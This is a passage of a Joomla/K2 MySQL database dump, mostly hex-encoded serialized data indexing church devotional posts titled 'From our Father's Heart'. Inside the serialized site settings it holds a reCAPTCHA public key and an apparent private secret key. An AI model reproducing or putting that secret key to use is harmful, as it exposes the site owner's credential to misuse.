6b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223236223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a32313a2235353a646976696e652d6170706f696e746d656e74223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a33393a22636f6d706f6e656e742f6b322f6974656d2f35352d646976696e652d6170706f696e746d656e74223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3535223b733a353a22726f757465223b733a35383a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d35353a646976696e652d6170706f696e746d656e74223b733a353a227469746c65223b733a37363a224b65657020796f7572206170706f696e746d656e7473206461696c79207769746820476f64202d2046726f6d206f7572204661746865722773204865617274202831362f30372f3230313729223b733a31313a226465736372697074696f6e223b733a3239303a2220446561726c792042656c6f7665642c204b65657020796f7572206170706f696e746d656e7473206461696c79207769746820476f642e2054686f73652077686f206b656570207468656972206170706f696e746d656e7473207769746820476f64206861766520666172206d6f72652073757065726e61747572616c20656e636f756e7465727320616e6420657870657269656e636573207468616e2074686f73652077686f20646f6ee28099742e20417320612062656c69657665722c2074686520677265617465737420626174746c6520796f752077696c6c20666163652077696c6c2062652074686520626174746c6520746f206b65657020796f757220706572736f6e616c206170706f696e746d656e7473207769746820476f642e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30372d31362030393a35353a3433223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30372d31362030393a35353a3433223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(290, 'index.php?option=com_k2&view=item&id=56', 'index.php?option=com_k2&view=item&id=56:don-t-serve-god-carelessly-from-our-father-s-heart-02-07-2017', 'Don\'t serve God carelessly - From our Father\'s Heart (02/07/2017)', ' Dearly Beloved, Jeremiah 48 vs 10 says “ Cursed be he that doeth the work of the Lord deceitfully, and cursed be he that keepeth back his sword from blood.” ', '2017-07-16 10:15:12', '7f5b9f98dd9f6c2e92de43bcefd4696d', 1, 1, 1, '*', '2017-07-16 10:11:34', '0000-00-00 00:00:00', '2017-07-16 10:11:34', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223536223b733a353a22616c696173223b733a36313a22646f6e2d742d73657276652d676f642d636172656c6573736c792d66726f6d2d6f75722d6661746865722d732d68656172742d30322d30372d32303137223b733a373a2273756d6d617279223b733a3137373a223c703e446561726c792042656c6f7665642c3c2f703e0d0a3c703e4a6572656d696168203438207673203130207361797320e2809c20437572736564206265206865207468617420646f6574682074686520776f726b206f6620746865204c6f72642064656365697466756c6c792c20616e64206375727365642062652068652074686174206b656570657468206261636b206869732073776f72642066726f6d20626c6f6f642ee2809d3c2f703e0d0a223b733a343a22626f6479223b733a313934383a220d0a3c703e476f64206973206120476f64206f6620657863656c6c656e636520616e64206f726465722e20486520646f6573206e6f7420616363657074206a75737420616e797468696e672e2053657276696e6720476f6420686173207072696e6369706c65732c20707265636570747320616e64207374616e646172642e20536f2c20646f6ee28099742073657276652048696d20616e79686f772e204f6e65206f6620746865206669727374207472757468732073746174656420696e20746865204269626c6520697320746865207374616e64617264206f662073657276696365207468617420476f6420616363657074732e20476f6420686174657320746f2062652073657276656420616e79686f772e205468617420776173207768617420736570617261746564204361696e2066726f6d204162656c2e20476f64206163636570746564204162656ce2809973206f66666572696e6720616e642072656a6563746564204361696ee28099732062656361757365206f6620746865207374616e6461726420616e64206174746974756465207769746820776869636820746865792063616d6520746f20476f642e3c2f703e0d0a3c703e596f75206e65656420746f206b6e6f77207468617420616e792073657276696365206e6f7420757020746f20646976696e65207374616e64617264732067656e65726174657320746865207772617468206f6620476f642e20476f64206c6f766573207573206275742048652077696c6c206e65766572206163636570742077726f6e6720616e64206d6564696f63726520736572766963652066726f6d20616e79206d616e2e20476f6420616c776179732077616e74732074686520626573742e3c2f703e0d0a3c703e497420697320626574746572206e6f7420746f20736572766520476f64207468616e20746f2073657276652048696d20616e79686f772e20476f642077616e747320757320746f2073657276652048696d20627574206e6f74206174206f7572206f776e207374616e646172642e204e6f7420617420796f7572206f776e2074696d6520627574204869732c206e6f7420617420796f7572206f776e20636f6e76656e69656e636520627574206174204869732064656d616e64732e204272696e6720657863656c6c656e636520616e6420686f6e6f757220696e746f20796f757220736572766963652e20416e792073657276696365207468617420796f7520617265206272696e67696e6720746f20476f64206569746865722073706972697475616c206f7220706879736963616c206d75737420636f6d65207769746820686f6e6f75722e3c2f703e0d0a3c703e546865204c6f726420746f6c64206d652079656172732061676f20e2809c204d7920736f6e204920616d206120736572696f757320476f642c20696620796f752074616b65206d6520736572696f75732c20492077696c6c2074616b6520796f7520736572696f7573e2809d2e20596f75722073657276696365206d75737420636f6d6520746f20476f64206174207468652068696768657374206c6576656c206f6620736572696f75736e6573732e3c2f703e0d0a3c703e476f6420646f6573206e6f742061636365707420636172656c65737320617474697475646520696e20736572766963652e205468652074776f20736f6e73206f66204161726f6e20756e64657273746f6f64207468617420696e2061207665727920636f73746c79207761792e20546865792062726f7567687420737472616e6765206669726520696e746f204869732070726573656e636520616e6420486520736d6f7465207468656d2e20476f64206973206120476f64206f662064657461696c7320616e64207370656369666963732e2048652067697665732064657461696c7320616e6420737065636966696373206f6620686f772048652077616e7473206d656e20746f2073657276652048696d2e20446f6ee280997420736572766520476f6420636172656c6573736c792e3c2f703e0d0a3c703e446575742e203130207673203132207361797320e2809c20416e64206e6f772049737261656c2c207768617420646f746820746865204c4f52442074687920476f642072657175697265206f6620746865652c2062757420746f206665617220746865204c4f52442074687920476f642c20746f2077616c6b20696e20616c6c2068697320776179732c20616e6420746f206c6f76652068696d2c20616e6420746f20736572766520746865204c4f52442074687920476f64207769746820616c6c2074687920686561727420616e64207769746820616c6c2074687920736f756c2ee2809d20476f642077616e7473206d656e20746f2073657276652068696d207769746820616c6c20746865697220686561727420616e6420736f756c2e20446f6ee2809974206a6f696e207468652067726f7570206f662070656f706c65207468617420736572766520476f6420617320696620746865792061726520646f696e672048696d2061206661766f75722e2053657276652048696d207769746820616c6c20796f757220706f7373657373696f6e20616e6420657665727920636170616369747920746861742048652068617320676976656e20796f752e3c2f703e0d0a3c703ec2a03c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30372d31362031303a31353a3131223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223237223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a36343a2235363a646f6e2d742d73657276652d676f642d636172656c6573736c792d66726f6d2d6f75722d6661746865722d732d68656172742d30322d30372d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a38323a22636f6d706f6e656e742f6b322f6974656d2f35362d646f6e2d742d73657276652d676f642d636172656c